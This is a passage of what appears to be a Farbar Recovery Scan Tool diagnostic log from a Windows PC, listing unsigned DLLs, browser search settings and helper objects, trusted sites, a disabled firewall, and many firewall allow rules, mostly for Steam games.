2018-02-08 12:04 - 2012-05-07 15:23 - 000040960 _____ (Realtek) [File not signed] C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\RtlICS.dll
2018-02-08 12:04 - 2012-10-01 12:05 - 000266240 _____ (Realtek) [File not signed] C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\RtlIhvOid.dll
2019-11-10 11:38 - 2019-11-10 11:38 - 001124352 _____ (Robert Simpson, et al.) [File not signed] [File is in use] C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\SQLite\System.Data.SQLite.dll
2019-11-27 13:27 - 2019-11-27 13:27 - 001189888 _____ (Robert Simpson, et al.) [File not signed] C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\Cipolla\x86\SQLite.Interop.dll
2018-02-08 12:04 - 2009-07-23 18:32 - 001122304 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\LIBEAY32.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000031744 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qgif.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000040960 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qicns.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000031744 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qico.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000345600 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qjpeg.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000025088 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qsvg.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000024576 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qtga.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000023552 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qwbmp.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000502784 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qwebp.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 001413632 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\platforms\qwindows.dll
2019-03-12 19:52 - 2019-03-12 19:52 - 005786112 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Core.dll
2018-12-20 17:10 - 2018-12-20 17:10 - 006303232 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Gui.dll
2018-12-20 17:10 - 2018-12-20 17:10 - 001077248 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Network.dll
2018-12-20 17:10 - 2018-12-20 17:10 - 000323584 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Positioning.dll
2018-12-20 17:10 - 2018-12-20 17:10 - 003556352 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Qml.dll
2018-12-20 17:10 - 2018-12-20 17:10 - 003699712 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Quick.dll
2018-12-20 17:10 - 2018-12-20 17:10 - 000331264 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Svg.dll
2018-12-20 17:10 - 2018-12-20 17:10 - 000113152 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebChannel.dll
2018-12-20 17:10 - 2018-12-20 17:10 - 000355328 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebEngine.dll
2018-12-20 17:10 - 2018-12-20 17:10 - 076171264 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebEngineCore.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 005590528 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Widgets.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000461312 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WinExtras.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000189952 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Xml.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 002821632 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5XmlPatterns.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000053760 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000059392 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\qtgraphicaleffectsplugin.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000017408 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000327680 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000137728 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000089600 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000017920 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2018-12-20 17:11 - 2018-12-20 17:11 - 000135680 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\styles\qwindowsvistastyle.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vsmon => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer (Version 11) (Whitelisted) ==========

HKU\S-1-5-21-546064741-869659242-2245885051-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.yahoo.com/?fr=fp-comodo&type;=81_25050030005_77.0.3865.120_u_hp_sp
SearchScopes: HKU\S-1-5-21-546064741-869659242-2245885051-1000 -> DefaultScope {0AA24E16-07B3-4694-8357-3C21ACC5F516} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=comodo&hsimp;=yhs-com_chrome&type;=81_25050030005_77.0.3865.120_u_ds_sp&p;={searchTerms}
SearchScopes: HKU\S-1-5-21-546064741-869659242-2245885051-1000 -> {0AA24E16-07B3-4694-8357-3C21ACC5F516} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=comodo&hsimp;=yhs-com_chrome&type;=81_25050030005_77.0.3865.120_u_ds_sp&p;={searchTerms}
SearchScopes: HKU\S-1-5-21-546064741-869659242-2245885051-1000 -> {993F5746-4C15-42BC-99C1-064A1764271B} URL = hxxps://securesearch.org?q={searchTerms}
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2020-01-31] (IObit Information Technology -> IObit)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_261\bin\ssv.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2018-02-09] (Google Inc -> Google Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_261\bin\jp2ssv.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2008-06-11] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\ssv.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2018-02-09] (Google Inc -> Google Inc.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\jp2ssv.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2018-02-09] (Google Inc -> Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2018-02-09] (Google Inc -> Google Inc.)

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\…\localhost -> localhost
IE trusted site: HKU\.DEFAULT\…\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\localhost -> localhost
IE trusted site: HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 05:34 - 2009-06-11 00:00 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Calibre2\
HKU\S-1-5-21-546064741-869659242-2245885051-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Ohm\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{13AC0B02-D261-474E-9172-A773776AA48C}] => (Allow) C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\RtWLan.exe (ASUSTeK Computer Inc.) [File not signed]
FirewallRules: [{4A8E9374-1F4E-483B-BBDD-F3190B747141}] => (Allow) C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\RtWLan.exe (ASUSTeK Computer Inc.) [File not signed]
FirewallRules: [{FBFE99E6-D536-4912-B6A1-671E8370A1C7}] => (Allow) LPort=1542
FirewallRules: [{3DACF9EB-D731-4D68-8008-DF0AB77FD6BC}] => (Allow) LPort=1542
FirewallRules: [{69AA44E2-C106-461D-8069-2C1E271CF14C}] => (Allow) LPort=53
FirewallRules: [{1F5568C3-2ECD-48FA-A1AD-B75A044C5175}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe (Nullsoft Inc. -> Nullsoft, Inc.)
FirewallRules: [{2DBA2658-7FFB-4904-997F-4943CA94DF52}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe (Nullsoft Inc. -> Nullsoft, Inc.)
FirewallRules: [{3B90D67B-08BD-490A-910D-734B0F1D83DD}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{E9DEE973-3A5D-46DB-96A2-CAAFEE6D96C4}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{60A82F1C-1ACC-4244-9F96-38F9797B0A2A}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{5EEEE138-65FD-482A-8DA6-A3316AEC22B0}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{EF25E6C8-1D4B-4965-942B-18F6DF83F4D5}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{366A78EF-FD44-4DB1-BDBD-4907953153D7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{FBD95A72-4A52-4C97-8674-E44B461AD792}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Martial Arts Brutality\dojo.exe () [File not signed]
FirewallRules: [{E1344563-239E-4393-A997-E2A9F3CED800}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Martial Arts Brutality\dojo.exe () [File not signed]
FirewallRules: [{6BD1B9F0-B1EB-4475-8785-087EE43DAE8E}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Battlerite\Battlerite.exe (Stunlock Studios AB -> )
FirewallRules: [{51A404E6-A4A7-4922-8AE3-86F7C6F22989}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Battlerite\Battlerite.exe (Stunlock Studios AB -> )
FirewallRules: [{F0F690ED-D867-402F-9022-F55FD2F44E94}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Sentinels of the Multiverse\Sentinels.exe () [File not signed]
FirewallRules: [{CAEDEF54-EF81-4426-92A1-C33F2E1E300D}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Sentinels of the Multiverse\Sentinels.exe () [File not signed]
FirewallRules: [{6B4D3CA5-B537-46BD-97AD-A415C8829F53}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Eternal Card Game\Eternal.exe (Dire Wolf Digital, LLC -> )
FirewallRules: [{79B88A9C-259C-4CDA-A636-8DA6DAA3DE38}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Eternal Card Game\Eternal.exe (Dire Wolf Digital, LLC -> )
FirewallRules: [{3CF0DE86-0CF4-43C4-841C-D1C7668E974D}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Battlegrounds of Eldhelm\Eldhelm.exe () [File not signed]
FirewallRules: [{56ECAE86-FAEF-44F4-9756-9C6838C30DB2}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Battlegrounds of Eldhelm\Eldhelm.exe () [File not signed]
FirewallRules: [{F352B495-A898-4EEB-8D2F-C99BAE6B9C21}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Chronicle\Chronicle.exe (Jagex Ltd -> )
FirewallRules: [{3F1D6176-95BE-4A4C-87B0-E96501482CA7}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Chronicle\Chronicle.exe (Jagex Ltd -> )
FirewallRules: [{7A5954EB-F5D4-4015-AAF3-CEED4A0EF385}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Chronicle\WorkshopTool\WorkshopManager.exe (Jagex Ltd -> )
FirewallRules: [{4D8F6B25-B48D-4A4B-9A1B-960D6E4F9CA4}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Chronicle\WorkshopTool\WorkshopManager.exe (Jagex Ltd -> )
FirewallRules: [{F68017C0-D34B-4032-B938-A88000E12295}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Cards and Castles\Cards and Castles.exe () [File not signed]
FirewallRules: [{5EBABB6A-AB9C-4B58-ACA4-17038921D9A7}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Cards and Castles\Cards and Castles.exe () [File not signed]
FirewallRules: [{AE18D7BE-F2EF-4BB0-9C5D-75562A486949}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Spellweaver\Spellweaver.exe () [File not signed]
FirewallRules: [{8BB0F1EA-68C6-4DA5-9ED7-2C039452CDF3}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Spellweaver\Spellweaver.exe () [File not signed]
FirewallRules: [{6B49FF15-1AFB-4BF6-9294-7C6AE146A2C9}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Astral Heroes\AstralHeroes.exe () [File not signed]
FirewallRules: [{12518C2A-8270-4DF7-BEC6-4AEF62C7AC16}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Astral Heroes\AstralHeroes.exe () [File not signed]
FirewallRules: [{EB8D62E8-DBF9-40DA-A729-D6C8FA63013B}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Ortus Regni\OrtusRegni.exe () [File not signed]
FirewallRules: [{DA3B6AD3-A220-42BE-9856-578811621444}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Ortus Regni\OrtusRegni.exe () [File not signed]
FirewallRules: [{2184640D-C2C9-44DD-93CA-1AD6FF168DF6}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Tactical Monsters\Tactical Monsters.exe () [File not signed]
FirewallRules: [{A4304288-FB07-42EA-82EC-24645002C3D8}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Tactical Monsters\Tactical Monsters.exe () [File not signed]
FirewallRules: [{9246D236-DB76-4A09-A629-F93E80653D13}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Shadowverse\Shadowverse.exe () [File not signed]
FirewallRules: [{0F0E603F-E09F-4478-87CD-31274F77DD4B}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Shadowverse\Shadowverse.exe () [File not signed]
FirewallRules: [{905F4624-B9B4-4A1A-A192-184BB278556A}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Duel of Summoners\DuelofSummoners.exe (NEXON Korea Corporation. -> )
FirewallRules: [{1F04705D-021C-420E-B6CC-E67C8A76C14E}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Duel of Summoners\DuelofSummoners.exe (NEXON Korea Corporation. -> )
FirewallRules: [{3F6C1B57-8F1D-437A-91C9-BABD94FD2178}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Onirim - Solitaire Card Game\Onirim.exe () [File not signed]
FirewallRules: [{D400429A-BB8B-44DF-91B4-9576F4FCAD78}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Onirim - Solitaire Card Game\Onirim.exe () [File not signed]
FirewallRules: [{90390A5E-7D96-4008-A841-09227A5B65DD}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Pox Nora\PoxNora.exe (Desert Owl Games LLC -> ) [File not signed]
FirewallRules: [{3F46C582-CB46-4E20-99F8-376777F3F830}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Pox Nora\PoxNora.exe (Desert Owl Games LLC -> ) [File not signed]
FirewallRules: [{47CC63F3-6BAA-4882-96C7-C305F6992ACB}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\KROSMAGA\transition\transition.exe => No File
FirewallRules: [{2E3A88C4-89CC-4008-991D-C0629550F690}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\KROSMAGA\transition\transition.exe => No File
FirewallRules: [{7C611F52-3F19-473D-80FB-9C9662A7CA7B}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Labyrinth\labyrinth.exe () [File not signed]
FirewallRules: [{23FD260B-B49E-481F-8D1F-1A04279CFDA1}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Labyrinth\labyrinth.exe () [File not signed]
FirewallRules: [{5DB38868-76BA-4F68-9CDB-73462C479CFE}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Bombernauts\Bombernauts.exe () [File not signed]
FirewallRules: [{447B2F0E-E096-4D0F-B181-9AC5432EC0E2}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Bombernauts\Bombernauts.exe () [File not signed]
FirewallRules: [{85F9E4C2-E7CD-44C0-952A-4833D811F0C9}] => (Allow) C:\Program Files (x86)\Apowersoft\Apowersoft Screen Recorder Pro 2\Apowersoft Screen Recorder Pro 2.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{869E6D6A-6390-4853-B7F4-F4787B20BBA4}] => (Allow) C:\Program Files (x86)\Apowersoft\Apowersoft Screen Recorder Pro 2\Apowersoft Screen Recorder Pro 2.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{8ECBCA13-02E2-401D-9EE7-7CDBF89C3973}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\From The Depths\From_The_Depths.exe () [File not signed]
FirewallRules: [{BA280F7C-0C0B-48FC-B482-102F3980AAE3}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\From The Depths\From_The_Depths.exe () [File not signed]
FirewallRules: [{3D594138-089F-495D-9B7E-A96F27CBE7C6}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{158647BF-7FA8-4611-B72E-BB8763C5AF25}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{FE0BF3AE-9534-4008-A3F3-988202A5039A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SeriousSamDoubleD\SSLauncher.exe () [File not signed]
FirewallRules: [{99553DA1-2204-4E91-AA9D-BEA8B60C31C5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SeriousSamDoubleD\SSLauncher.exe () [File not signed]
FirewallRules: [{A9B8405C-2DF6-483A-B962-1EF1FA96ADF2}] => (Allow) C:\Program Files (x86)\Maxthon5\Bin\Maxthon.exe (Maxthon Technology Co, Ltd. -> Maxthon International ltd.)
FirewallRules: [{191FA7A8-41B4-4CD4-B09F-9F865E97288B}] => (Allow) C:\Program Files (x86)\Maxthon5\Bin\Maxthon.exe (Maxthon Technology Co, Ltd. -> Maxthon International ltd.)
FirewallRules: [{4BC42913-3309-4C4E-AEFA-4FB1FB61B30A}] => (Allow) C:\Program Files\Pale Moon\palemoon.exe (Moonchild Productions) [File not signed]
FirewallRules: [{223599C5-15BD-46D8-8927-954F3F235014}] => (Allow) C:\Program Files\Pale Moon\palemoon.exe (Moonchild Productions) [File not signed]
FirewallRules: [{AD7AD3CB-DA04-4708-8B64-20FCD08D9231}] => (Allow) C:\Program Files\Waterfox\waterfox.exe (Waterfox Limited -> Waterfox)
FirewallRules: [{EF2CAD5C-A71D-478E-BC0C-7D7C45760C2E}] => (Allow) C:\Program Files\Waterfox\waterfox.exe (Waterfox Limited -> Waterfox)
FirewallRules: [{E3CC7716-30C3-4CEF-9EC8-FC13513CDFC9}] => (Allow) C:\Program Files (x86)\Microsoft Games\Dungeon Siege 2\DungeonSiege2.exe (Gas Powered Games) [File not signed]
FirewallRules: [{4941923C-47DE-41D4-B9F1-93604C3DE1A0}] => (Allow) C:\Program Files (x86)\Microsoft Games\Dungeon Siege 2\DungeonSiege2.exe (Gas Powered Games) [File not signed]
FirewallRules: [{CBD9A69C-44DE-46F9-9E5E-066D67FAF82E}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Monster Slayers\Monster Slayers DB.exe (Nerdook Productions Sdn Bhd) [File not signed]
FirewallRules: [{397B1EB2-6AFD-49EB-A25E-A933C0D535D0}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Monster Slayers\Monster Slayers DB.exe (Nerdook Productions Sdn Bhd) [File not signed]
FirewallRules: [{99DDEFE3-8827-48BD-9B66-65B34E8692B2}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Crashlands\Crashlands.exe (Butterscotch Shenanigans, Inc -> Butterscotch Shenanigans)
FirewallRules: [{01FA676D-F062-4AF2-8359-904564C967F7}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Crashlands\Crashlands.exe (Butterscotch Shenanigans, Inc -> Butterscotch Shenanigans)
FirewallRules: [{D8AD3014-F545-41C7-AF12-6BD5D3E53295}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\ChaosReborn\ChaosRebornWin64.exe () [File not signed]
FirewallRules: [{1C183B27-9B49-4F99-B788-617C79F4309E}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\ChaosReborn\ChaosRebornWin64.exe () [File not signed]
FirewallRules: [{FA3D88C3-ECF2-4308-B9DC-0675393F4C01}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.3.0\DriverBooster.exe (IObit Information Technology -> IObit)
FirewallRules: [{4DBDCF92-C9AC-407E-8D47-1D2675FAAEB8}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.3.0\DriverBooster.exe (IObit Information Technology -> IObit)
FirewallRules: [{895E7A09-DACE-41E9-A514-A70AE0A2D501}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.3.0\DBDownloader.exe (IObit Information Technology -> IObit)
FirewallRules: [{84038D1F-1140-411B-B9C6-EC77C8A94370}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.3.0\DBDownloader.exe (IObit Information Technology -> IObit)
FirewallRules: [{61CA37A1-8120-476E-8424-A6938AC89370}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.3.0\AutoUpdate.exe (IObit Information Technology -> IObit)
FirewallRules: [{46D58F09-ED44-4E17-AE4D-693C0B2AE3A6}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.3.0\AutoUpdate.exe (IObit Information Technology -> IObit)
FirewallRules: [{3189DD01-591B-4A9A-8B8A-B8B9713C2AC3}] => (Allow) C:\Program Files (x86)\Tencent\WeChat\WeChat.exe => No File
FirewallRules: [{977B8007-A94F-4213-B0F2-C6B3F42B2ED9}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Rise of Legions\RiseOfLegions.exe () [File not signed]
FirewallRules: [{5B451CC4-07D3-4C26-914A-F7D4ADFF3584}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Rise of Legions\RiseOfLegions.exe () [File not signed]
FirewallRules: [{06FEB7C9-9029-4478-B3FB-797BB348680B}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Underlords\game\bin\win64\underlords.exe (Valve -> )
FirewallRules: [{9E157DD3-90CB-4606-80CA-E75574E3BC88}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Underlords\game\bin\win64\underlords.exe (Valve -> )
FirewallRules: [{22E63B52-1676-43AD-99D8-5B1F8D8DB6DA}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Bionic_Dues\Bionic.exe () [File not signed]
FirewallRules: [{2B67F9A7-8E10-4656-93A8-DCFEEBD80337}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Bionic_Dues\Bionic.exe () [File not signed]
FirewallRules: [{A80CC8D2-5C63-455B-9E36-9FC1B63A807F}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\SlayTheSpire\jre\bin\javaw.exe => No File
FirewallRules: [{C34293E2-0B59-4B57-94BE-82E20CC75699}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\SlayTheSpire\jre\bin\javaw.exe => No File
FirewallRules: [{9A86A4A6-31F0-453B-84A0-B9FE0E4941E9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SlayTheSpire\SlayTheSpire.exe () [File not signed]
FirewallRules: [{F9B3FD72-E2C8-4966-AD5F-C860492AF0BD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SlayTheSpire\SlayTheSpire.exe () [File not signed]
FirewallRules: [{73ACE5CC-714E-4FDA-8251-DBE54A1BB0EC}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Hammerwatch\Hammerwatch.exe () [File not signed]
FirewallRules: [{036BC05C-9EA3-453E-AB30-329CA6B06953}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Hammerwatch\Hammerwatch.exe () [File not signed]
FirewallRules: [{356753F7-CA8D-4DEC-8049-57A0CA4F6C95}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Hammerwatch\editor\HammerEditor.exe () [File not signed]
